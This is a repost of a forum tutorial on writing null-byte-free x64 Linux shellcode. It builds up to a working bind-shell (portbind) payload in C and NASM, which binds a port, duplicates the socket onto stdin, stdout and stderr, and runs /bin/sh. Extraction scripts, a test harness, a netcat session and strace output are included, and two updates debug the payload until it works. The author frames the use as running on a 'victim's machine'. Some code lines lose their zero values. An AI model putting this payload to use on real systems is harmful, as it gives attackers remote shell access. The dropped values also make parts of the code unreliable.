[ + ] Repost of Shellcode Programming

Due to the lack of availability of info on the topic I've decided to re-post this on my blog, I feel it's something I'd like to look back to if I need it:

Initially before writing this I thought to myself that because I had worked really hard on this matter (give or take about two weeks or so of constant hammering), I have just opened doors that were previously closed to me due to the passage of time and how things change. But I was convinced that what this community stands for, and how without it and someone there to guide me on this journey I'd be lost as hell. So I figured I'd give back by sharing what I've learned recently, which is creating shellcode for a portbind attack... however, the difference between what is commonly used to make it and my version of doing so, is that I use a more logical and concise method of doing it. To preface this I'm going to assume that you know x64 ASM, C network programming, and the basics of using Linux. I am also trusting that this post stays within the Soldierx community, I strongly support this community and hope to see its members cherish from this information.

If you don't know x64 ASM, I would recommend using Ray Seyfarth's Intro to x64 on Linux (and Windows for future projects):
https://www.amazon.com/s/ref=dp_byline_sr_book_1?ie=UTF8&text=Ray+Seyfar...
If you don't know C network programming I highly recommend Linux Socket Programming By Example by Warren Gay:
https://www.amazon.com/Linux-Socket-Programming-Example-Warren/dp/078972...

A lot of sources that refer to shellcode and assembly tend to be outdated and that is the biggest obstacle when reading something like the shellcoder's handbook, and often times a lot of techniques used don't work. There is a massive change in how the processor interprets shellcode now in our x64 age than it used to in x32 predecessor due to the way opcodes are interpreted and how the circuits for the AMD architecture have evolved. Why Shellcode? Because you can attach shellcode to a running process on the victim's machine, how to do this, I'll save for another time. The first thing you can start with in all of this is a simple Hello World in C:

int main(int argc, char **argv)
{
        write(1, "Hello, World!", 12);
}

Now if you copy and compile this using gcc and run the resulting a.out file you'll get the infamous hello world. But what you should be asking is why did I write it like this? No headers included or anything? The reason is because I am using what is known as a system call. Unlike write(), printf() is not something that is understood by the processor, instead printf() is something that is added by the GNU C Compiler to work with write() as well as other methods of aligning data to a string. Syscalls have individual values to them from 0 to 1024 and are contained in a header file titled unistd.h . Within Ubuntu, which is what I'm using the real name of this header file is unistd_64.h, and that's because 32 and 64 bit operating system versions have different values for individual syscalls. To find out where your unistd file is, simply use the find command to look for it and concatenate it in terminal:

find /usr/include -name unistd.h
cat <what you get here>

You can also look for syscall values on the internet for example on this page:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

So lets use what we know to write our hello world script using assembly using the write syscall:

section .data
    msg db      "hello, world!"

section .text
    global _start
_start:
    mov     rax, 1
    mov     rdi, 1
    mov     rsi, msg
    mov     rdx, 13
    syscall
    mov    rax, 60
    mov    rdi,
    syscall

using nasm to compile it and ld to link the resulting object file:
nasm -f elf64 -g hello.asm
ld -o hello hello.o
./hello

Should print out Hello world. Then you can objdump it to disassemble out the resulting shellcode:
$objdump -d hello

hello:     file format elf64-x86-64


Disassembly of section .text:

00000000004000b0 <_start>:
  4000b0:       b8 01 00 00 00          mov    $0x1,%eax
  4000b5:       bf 01 00 00 00          mov    $0x1,%edi
  4000ba:       48 be d8 00 60 00 00    movabs $0x6000d8,%rsi
  4000c1:       00 00 00
  4000c4:       ba 0d 00 00 00          mov    $0xd,%edx
  4000c9:       0f 05                   syscall
  4000cb:       b8 3c 00 00 00          mov    $0x3c,%eax
  4000d0:       bf 00 00 00 00          mov    $0x0,%edi
  4000d5:       0f 05                   syscall
                ^ shellcode  ^

The problem with this shellcode is that it has too many of what we call null bytes present. What happens is that nullbytes end up cancelling out the effects of shellcode and the processor interprets them as EOF calls for our program. Ah I should add on that shellcode are the individual hex values for the processor to interpret what the program is doing for example take the first mov instruction:

\xb8\x01 ---gets interpreted by processor as --> 1011 1000 0000 0001 --to processor-->\xb8\ tells the processor you want to mov to register rax, \x01 tells the processor you want to move the value of 0x1 to it.

the extra 00s you see are a result of the entire 64 bit long register being used, which leads to me showing you this:
https://imgur.com/a/rWUz75J

There are four ways to get rid of null bytes, and I will show you how the first three are done after explaining them:
1-push the value into the stack and pop it into the register
2-move the value into the first 8 bits (or 1 byte) of the register
3-using the jump and call trick
4-for strings, write each character using ascii hex characters into the appropriate registers

And here's our hello world without all the null bytes:

global _start
section .text      
_start:
    jmp short data

shellcode:
    xor     rax,rax
    xor     rdi, rdi
    xor     rsi, rsi
    xor     rdx, rdx
    mov     al, 1       ;1-moving into lowest byte of register
    push    byte 1      ;2-pushing the value into stack
    pop     rdi         ;2-and then popping it
    pop     rsi         ;3-popping the address of msg from stack
    mov     dl, 13      ;1-m
    syscall
   
    mov     al, 60
    mov     dil, 1
    syscall

data:
    call shellcode
    msg     db "Hello, World!"

Now compile it like before and objdump it:
$ objdump -d hello

hello:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:       eb 1d                   jmp    40009f <data>

0000000000400082 <shellcode>:
  400082:       48 31 c0                xor    %rax,%rax
  400085:       48 31 ff                xor    %rdi,%rdi
  400088:       48 31 f6                xor    %rsi,%rsi
  40008b:       48 31 d2                xor    %rdx,%rdx
  40008e:       b0 01                   mov    $0x1,%al
  400090:       6a 01                   pushq  $0x1
  400092:       5f                      pop    %rdi
  400093:       5e                      pop    %rsi
  400094:       b2 0d                   mov    $0xd,%dl
  400096:       0f 05                   syscall
  400098:       b0 3c                   mov    $0x3c,%al
  40009a:       40 b7 01                mov    $0x1,%dil
  40009d:       0f 05                   syscall

000000000040009f <data>:
  40009f:       e8 de ff ff ff          callq  400082 <shellcode>

00000000004000a4 <msg>:
  4000a4:       48                      rex.W
  4000a5:       65 6c                   gs insb (%dx),%es:(%rdi)
  4000a7:       6c                      insb   (%dx),%es:(%rdi)
  4000a8:       6f                      outsl  %ds:(%rsi),(%dx)
  4000a9:       2c 20                   sub    $0x20,%al
  4000ab:       57                      push   %rdi
  4000ac:       6f                      outsl  %ds:(%rsi),(%dx)
  4000ad:       72 6c                   jb     40011b <msg+0x77>
  4000af:       64                      fs
  4000b0:       21                      .byte 0x21

And it's free of null bytes! Laughing out loud
Now all you have to do is extract and test the shellcode, to do this I've made a simple bash script from a command written by someone else on the internet that uses one command to extract the code of the objdump you can save this and chmod +x it so that it becomes a shell executable:
#!/bin/bash
PROGRAM=$1
objdump -d ./${PROGRAM}|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

save this into a file and chmod it then run it with the hello program to get:
$ ./extract-shell hello
"\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21"

Then copy and paste this into our C code to test the shellcode itself (I named mine test.c):
char code[]="\xeb\x1d\x48\x31\xc0\xb0\x01\x48\x31\xff\x40\xb7\x01\x48\x31\xf6\x5e\x48\x31\xd2\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21";
int main(int argc, char **argv)
{
        int (*func)();
        func = (int (*)()) code;
        (int)(*func)();

}

Compile this code and run it like so (note if you get an error for execstack, you can install it on ubuntu using sudo apt install execstack:
$gcc -fno-stack-protector -z execstack test.c
$./a.out
Hello,World!

So now that you know how to write shellcode, next step is learning it to do something useful like making port binding shellcode. The theory is very simple, your shellcode will simply bind your socket to an ip address and port, in which you then duplicate the client socket to to your stdin, stdout, and stderr file descriptors, that way when you for example execute a write syscall, instead of going through your stdout file descriptor, it instead goes to the client socket file descriptor.

1)victim becomes a server<----you connect to the victim that has this shellcode --- hacker
2)you use a execve syscall to start a shell

Heres a C code I wrote for it, in this case I'm using my private ip of 192.168.1.16 and port 1234 as the target (this is my private ip):

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <stdio.h>

int main()
{
        // Create the socket (man socket)
        // AF_INET for IPv4
        // SOCK_STREAM for TCP connection
        int host_sock = socket(AF_INET, SOCK_STREAM, ); //<--0 after the comma

        // Create sockaddr_in struct (man 7 ip)
        struct sockaddr_in host_addr;
        host_addr.sin_family = AF_INET;
        host_addr.sin_port = htons(1234);
        host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");
        // Bind address to socket (man bind)
        bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        // Use the created socket to listen for connections (man listen)
        listen(host_sock, ); //<---0 after the comma

        // Accept connections, (man 2 accept) use NULLs to not store connection information from peer
        int client_sock = accept(host_sock, NULL, NULL);

        // Redirect stdin, stdout, stderr to client
        dup2(client_sock, ); //<---0 after the comma
        dup2(client_sock, 1);
        dup2(client_sock, 2);

        // Execute /bin/sh (man execve)
        execve("/bin/sh", NULL, NULL);
}

When you compile and run this it stands on standby until the hacker connects to it, in this case I'm going to use netcat which is a program that comes on most Linux systems and I believe in older versions of windows, in order to connect to the victim:
$nc 192.168.1.16 1234
echo hello!
hello!
id
uid=1000(ghost) gid=1000(ghost) groups=1000(ghost),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),128(kvm),129(ubridge),132(libvirt)

Now to try and write the shellcode for this, is harder than writing the assembly for it. So what I did that distinguishes this post from anything else available in the 4% of the internet that we can see, is that I used a C style struct in the assembly (No C involved I promise), and used logical methods of executing syscalls that correlates with the way I've written it in the C code using no fancy assembly instructions or methods of filling in the blanks:

segment .data

;struct sockaddr_in host_addr;
;host_addr.sin_family = AF_INET;
;host_addr.sin_port = htons(1234);
;host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");

struc sockaddr_in
        sin_family  resw 1              ;allocate 2 bytes
        sin_port        resw 1          ;allocate 2 bytes
        sin_addr        resd 1          ;allocate 4 bytes (for 32 bit address)
        sin_zero        resb 8          ;allocate 8 bytes (for the 0 padding)
endstruc

host_addr istruc sockaddr_in
        at sin_family, dw 0x02
        at sin_port, dw 0xd204          ;port 1234 hex translates to 4d2 written in host byte order
        at sin_addr, dd 0x1001A8C0  ;address 192.168.1.16
        at sin_zero, db
iend

msg db "got here"
bin db "/bin/sh"

segment .text
        global _start
_start:
        ;sock= socket(AF_INET, SOCK_STREAM, 0)
        mov     rax,41
        mov             rdi,2                 ; got these values from the socket.h header file can use find /usr/include -name socket.h to find it
        mov             rsi,1
        syscall
        mov             rbx,rax                 ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,49                  ;load the syscall value for bind
        mov             rdi,rbx                 ;load the file descriptor we saved earlier
        mov             rsi,host_addr   ;load the address of the struct
        mov             rdx,16                  ;the size is 16 bytes
        syscall
        cmp             rax,
        jl              exit

        ;listen(host_sock, 0);
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,50                  ;load the syscall value for listen
        mov             rdi,rbx                 ;load the file descriptor
        syscall

        ;int client_sock = accept(host_sock, NULL, NULL);
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,43                  ;load the syscall value for accept
        mov             rdi,rbx                 ;load the file descriptor
        syscall
        mov             rcx,rax                 ;save the client file descriptor

        ;duplicate the file descriptors into stdin, stdout,stderr
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        mov             rax, 33
        mov             rdi, rcx
        mov             rsi,
        syscall

        xor     rax,rax
        mov             rax, 33
        mov             rsi, 1
        syscall

        xor     rax,rax
        mov             rax, 33
        mov             rsi, 2
        syscall

        ;and finally execute /bin/sh
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,59
        mov             rdi,bin
        syscall

        ;print got here (for debugging purposes)
        xor             rax, rax
        mov     rax,1
        xor             rdi, rdi
        mov             rdi,1
        xor             rsi,rsi
        mov             rsi, msg
        mov             rdx, 8
        syscall

exit:
        ;exit
        xor             rax,rax
        mov             rax,60
        xor             rdi,rdi
        syscall

If you need help understanding how I wrote my structure, you can check out this other post I made on the programming forums here:
https://www.soldierx.com/bbs/201809/Using-structures-NASM-x64-Assembly

See the way this works is you have to know that the sockaddr_in struct is 16 bytes in length. Go over the 16 bytes and your address wont be properly filled, go too low and you end up with a segmentation fault when the bind() syscall gets executed. after that, the rest is just filling in the blanks for the individual syscalls, and as you write this, you can test out how the settings will work out using the strace program as you go to see how each syscall is being filled out and keeping in mind that 1) returned values go into rax, and 2) that each syscall has a return value to it:

$ strace -e socket,bind,listen,accept,dup2 ./portbindasm
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) =
listen(3, )                            =
accept(3, NULL, NULL)                   = 4
dup2(4, )                              =
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
----should pause here if everything goes smoothly---
+++ exited with +++

And with that I'm going to stop here and let you, the reader, figure out how to write the shellcode for this. Until next time thanks for reading! Laughing out loud

-------------------------------------[UPDATE:9/28/18]-----------------------------------------------------------------------------------------

So I have to admit before testing this I had a working theory that my assembly code would work without the null bytes, and after writing my iteration of it, it did; then a new problem arose, when you insert it into the C code to test the null byte free shellcode, the strace ended up showing a lot of garbage values, and where the structure for the address and everything else would be filled in, nothing would get filled out correctly in its execution. For instance,
the socket and bind syscalls would turn out as:

socket(AF_INET, SOCK_DGRAM|SIGEV, 0xffffffffffffffffff63) = -1 [ERROR BAD ADDRESS]
bind(243, {sa_family=AF_INET, sin_port=htons(56865), sin_addr=inet_addr(0xfffffffffffffff2131123213)}, 16) = -1

As a result I went ahead and did things the traditional way, in which instead of defining the sockaddr_in structure the way I did previously, I pushed the values into stack and pointed the address of the stack to the register that would hold the pointer to the values within the stack as shown below:

segment .text
        global _start
_start:
        ;sock= socket(AF_INET, SOCK_STREAM, 0)
        push    41
        pop             rax
        push    2
        pop     rdi
        push    1
        pop             rsi
        xor             rdx,rdx
        syscall
        mov             rbx,rax                         ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
        mov             al,49                   ;load the syscall value for bind
        mov             dil,bl                  ;load the file descriptor we saved earlier

        ;build the sockaddr struct
        push    dword 0x1001A8C0;push my ip address into stack
        push    word  0xd204    ;push my port into stack
        push    word  2                 ;push the value for AF_INET
        mov             rcx,rsp                 ;move the stack pointer into rcx
        mov             rsi,rcx                 ;move rcx into the second argument of bind()
        mov             dl,16                   ;the size is 16 bytes
        syscall

        ;listen(host_sock, 0);
        xor             rax,rax                 ;zero out the argument registers
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             al,50                   ;load the syscall value for listen
        mov             dil,bl                  ;load the file descriptor
        syscall

        ;int client_sock = accept(host_sock, NULL, NULL);
        xor             rax,rax                 ;zero out the argument registers
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             al,43                   ;load the syscall value for accept
        mov             dil,bl                  ;load the file descriptor
        syscall
        mov             cl,al                   ;save the client file descriptor

        ;duplicate the file descriptors into stdin, stdout,stderr
        xor             rax,rax                 ;zero out the argument registers
        xor             rdi,rdi
        xor             rsi,rsi
        mov             al, 33
        mov             dil, cl
        syscall

        xor     rax,rax
        mov             al, 33
        mov             sil, 1
        syscall

        xor     rax,rax
        mov             al, 33
        mov             sil, 2
        syscall

        ;finally execute execve (where the problem is)
        xor     rax,rax
        push    rax
        xor     rdx,rdx
        xor     rsi,rsi
        mov     rbx,0x68732f2f6e69622f
        push    rbx
        push    rsp
        pop     rdi
        mov     al,0x3b
        syscall

        ;exit
        xor             rax,rax
        mov             al,60
        xor             rdi,rdi
        syscall

And after putting it in the shellcode generated for this in the test code created in C, the problem is in the execve call, where what should be "/bin/sh" turns into "/bin/shS", meaning 1 byte, is getting in the way of this finally executing:

$ strace -e socket,bind,accept,dup2,execve ./a.out
execve("./a.out", ["./a.out"], 0x7fffa9515d50 /* 58 vars */) =
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) =
accept(3, NULL, NULL)                   = 4
dup2(4, )                              =
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
execve("/bin/shS", NULL, NULL)          = -1 ENOENT (No such file or directory) <------------problem
                        ^

I have tried a lot of the things spread around within the internet, at this point I'm thinking that it could be Ubuntu, if you guys find anything that can make it work feel free to reply but until I can figure out how to fix this, all I can do is apologize and keep trying to look for a solution. Sad

-------------------------------------[UPDATE:9/29/18]-----------------------------------------------------------------------------------------
ALAS, I have found the persistent problem with my code, the issue was that execve was getting the wrong info from the shellcode. I was puzzled by the fact that when I tried solutions to the execve problem, by rewriting the exact same x64 codes and running them the way I showed in this tutorial, the codes ended up in execve turning up with an iteration of "/bin/sh" that didn't work. So I figured, what if I copy and paste the shellcode on the website on exploit DB, and it worked, and the guy showed the objdump of the execve file along with it! Then it hit me, what if my shellcode wasn't being extracted correctly this whole time, and that was exactly the case! Here I'll show you:

$ objdump --disassemble execve

execve:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:       48 31 c0                xor    %rax,%rax
  400083:       50                      push   %rax
  400084:       48 31 d2                xor    %rdx,%rdx
  400087:       48 31 f6                xor    %rsi,%rsi
  40008a:       48 bb 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rbx
  400091:       2f 73 68
  400094:       53                      push   %rbx
  400095:       54                      push   %rsp
  400096:       5f                      pop    %rdi
  400097:       b0 3b                   mov    $0x3b,%al
  400099:       0f 05                   syscall

$ ./extract-shell execve
"\x48\x31\xc0\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
                                                                                  ^if you notice, after \xbb\x2f there should be another \x2f

The idea of the execve shellcode is to run either "\\bin\sh" or "\bin\\sh" because this way the entire memory location gets filled upon pushing the buffer onto the stack. Keep in mind that I use an AMD FX 4300 processor, so I don't know if stack frames have more than 32 bits in length in modern intel processors, but to keep things simple, yes my stack memory locations are 32 bits long each; regardless, execve is built to handle our little "typo". So to fix this problem you could simply add the extra \x2f and testing the resulting shellcode then gives:

$ strace -e socket,dup2,accept,bind,execve ./a.out

execve("./a.out", ["./a.out"], 0x7fffffffdfd0 /* 58 vars */) =
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) =
accept(3, NULL, NULL)                   = 4
dup2(4, )                              =
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
execve("//bin/sh", NULL, NULL)          =

Success!